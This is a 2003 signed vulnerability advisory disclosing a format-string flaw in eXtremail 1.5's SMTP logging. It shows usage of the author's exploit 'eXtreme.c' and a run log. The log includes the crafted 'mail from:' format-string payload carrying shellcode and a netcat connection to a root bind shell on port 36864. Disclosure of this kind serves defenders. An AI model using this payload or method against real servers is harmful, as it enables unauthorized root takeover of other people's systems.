-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Remote Vulnerabilities in eXtremail Server. =========================================== Date: 02.07.2003 Email: B-r00t Reference: http://www.extremail.com/ Versions: Linux eXtremail-1.5-8 => VULNERABLE Linux eXtremail-1.5-5 => VULNERABLE Exploit: eXtreme.c eXtreme is a Unix mailserver, providing SMTP (port25), POP3 (port 110) and IMAP(port 143) services. The latest versions of which are still vulnerable to Format Strings vulnerabilities as discovered previously. http://www.securityfocus.com/bid/2908/info/ eXtremail contains a format string vulnerability in it's logging mechanism. It is possible for users to send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability. eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host. It is also possible to crash eXtremail. If it is not restarted automatically, a denial of SMTP service will result. These vulnerabilities were apparently fixed in version 'eXtremail 1.1.10', however they seem to have emerged in the latest versions. Attached exploit [eXtreme.c] for latest versions of eXtremail. $ gcc -o eXtreme eXtreme.c $ ./eXtreme eXtreme by B-r00t . (c) 2003 Usage: eXtreme [IP_ADDRESS] [TARGET] Example: eXtreme 10.0.0.1 2 0 RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm) 1 Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz) 2 Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS) 3 eXtremail V1.5 DEBUG On success a r00tshell will be spawned on port 36864. $ ./eXtreme 192.168.0.50 2 eXtreme by B-r00t . (c) 2003 Connected to 192.168.0.50 Recv: 220 localdomain eXtremail V1.5 release 7 ESMTP server ready ... Send: HELO Br00t~R0x~Y3r~W0rld! Recv: 250 Hi, I am localdomain System type: Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS) Write Addy: 0xbefff0c8 RET (shellcode): 0xbefff1d4 PAD (alignment): 1 Payload: 254 / 266 max bytes Sending it ... Send: mail from: a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$nn^) F@ F@ /bin/shCf Vf VfC?)?A?AV v Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!! Connection to 192.168.0.50 36864 port [tcp/*] succeeded! id; uname -a; uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Linux RedHat-9-0 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386 GNU/Linux - -- B#. - ---------------------------------------------------- Email : B-r00t Key fingerprint = 74F0 6A06 3E57 083A 4C9B ED33 AD56 9E97 7101 5462 "You Would Be Paranoid If They Were Watching You !!!" - ----------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (OpenBSD) iD8DBQE/AitlrVael3EBVGIRAmIQAKCNyf8dsUV9Fw3WIFL7o64UDRTnmgCgpY39 HBOcgtG6P1BPhcxYzG/AoAM= =GHV2 -----END PGP SIGNATURE-----